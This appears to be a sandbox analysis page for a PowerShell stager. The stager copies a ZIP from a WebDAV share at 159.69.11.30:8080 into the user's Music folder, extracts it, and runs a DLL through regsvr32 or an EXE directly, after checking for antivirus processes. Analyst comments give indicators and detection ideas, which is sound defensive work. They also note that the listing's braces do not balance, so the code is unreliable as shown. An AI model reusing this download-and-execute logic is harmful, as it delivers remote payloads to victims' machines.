Static | ZeroBOX
No static analysis available.
# Analyst notes: PowerShell stager as captured by the sandbox. It copies a ZIP archive
# from a remote WebDAV share into the user's Music folder, extracts it, and runs the
# extracted binary (payload.dll through regsvr32.exe, or load.exe directly).
# NOTE(review): the listing as captured has more opening than closing braces, so the
# block nesting below has to be inferred; it does not parse as shown.
# Indicators visible in this listing: 159.69.11.30 port 8080, load.zip, payload.zip,
# payload.dll, load.exe, and the drop folder %USERPROFILE%\Music.

# Source share and drop folder.
# The "\\host@port\DavWWWRoot" UNC form is the Windows WebDAV path syntax, so the copy
# below is fetched over HTTP on port 8080 (via the WebClient service) rather than over SMB.
$sourceWebDAV = "\\159.69.11.30@8080\DavWWWRoot"
# Resolves to the Music folder under the current user's profile.
$destinationFolder = [System.IO.Path]::Combine($env:USERPROFILE, "Music")
# Security-product process names and the default archive name
$antivirusProcesses = @("nortonsecurity.exe", "MsMpEng.exe") # Process names for Norton Security and Windows Defender
$filesToCopy = "load.zip" # Default file to copy
# Look up the Windows Defender process; -ErrorAction SilentlyContinue hides the error
# when no match is found, which leaves $defenderRunning empty.
$defenderRunning = Get-Process -Name "MsMpEng.exe" -ErrorAction SilentlyContinue
# Archive selection. The first operand tests the literal array defined above, not the
# running process list, and that array always contains "nortonsecurity.exe". The
# condition is therefore always true, and this sample requests payload.zip (the
# regsvr32 branch below) regardless of which security product is present.
if ($antivirusProcesses -contains "nortonsecurity.exe" -or $defenderRunning) {
$filesToCopy = "payload.zip"
# Check if the destination folder exists, and create it if necessary
if (-not (Test-Path -Path $destinationFolder -PathType Container)) {
New-Item -Path $destinationFolder -ItemType Directory -Force
# Build the remote and local paths for the selected archive
$sourceFile = Join-Path -Path $sourceWebDAV -ChildPath $filesToCopy
$destinationFile = Join-Path -Path $destinationFolder -ChildPath $filesToCopy
# Test-Path against the UNC path already contacts the remote host, so the network
# indicator is observable even when the archive is not present on the share.
if (Test-Path -Path $sourceFile -PathType Leaf) {
# -Force overwrites an existing file of the same name in the drop folder.
Copy-Item -Path $sourceFile -Destination $destinationFile -Force
# The Write-Host strings in this script are fixed text; where PowerShell script block
# logging is enabled they are usable as hunting strings.
Write-Host "Copied $filesToCopy to $destinationFolder"
# Extract and execute the appropriate file
if ($filesToCopy -eq "payload.zip") {
# Extracts every archive member into the drop folder, overwriting existing files (-Force).
Expand-Archive -Path $destinationFile -DestinationPath $destinationFolder -Force
$dllFile = Join-Path -Path $destinationFolder -ChildPath "payload.dll"
if (Test-Path -Path $dllFile -PathType Leaf) {
Write-Host "Executing regsvr32 for $dllFile"
# Signed-binary proxy execution (ATT&CK T1218.010): regsvr32.exe loads the DLL and
# /s suppresses its dialog boxes. Detection: powershell.exe spawning regsvr32.exe /s
# with a DLL path under a user profile folder. -Wait blocks until regsvr32 exits.
Start-Process -FilePath "regsvr32.exe" -ArgumentList "/s $dllFile" -Wait
}
else {
Write-Host "payload.dll not found in the extracted folder."
}
# Alternate branch: run the extracted executable directly.
elseif ($filesToCopy -eq "load.zip") {
Expand-Archive -Path $destinationFile -DestinationPath $destinationFolder -Force
$exeFile = Join-Path -Path $destinationFolder -ChildPath "load.exe"
if (Test-Path -Path $exeFile -PathType Leaf) {
Write-Host "Executing $exeFile"
# Detection: powershell.exe launching an executable from %USERPROFILE%\Music shortly
# after a ZIP was written and expanded there. -Wait blocks until the process exits.
Start-Process -FilePath $exeFile -Wait
}
else {
Write-Host "load.exe not found in the extracted folder."
}
# Reached when the selected archive is not present on the remote share.
else {
Write-Host "File $filesToCopy does not exist in the source WebDAV location."
No antivirus signatures available.
No IRMA results available.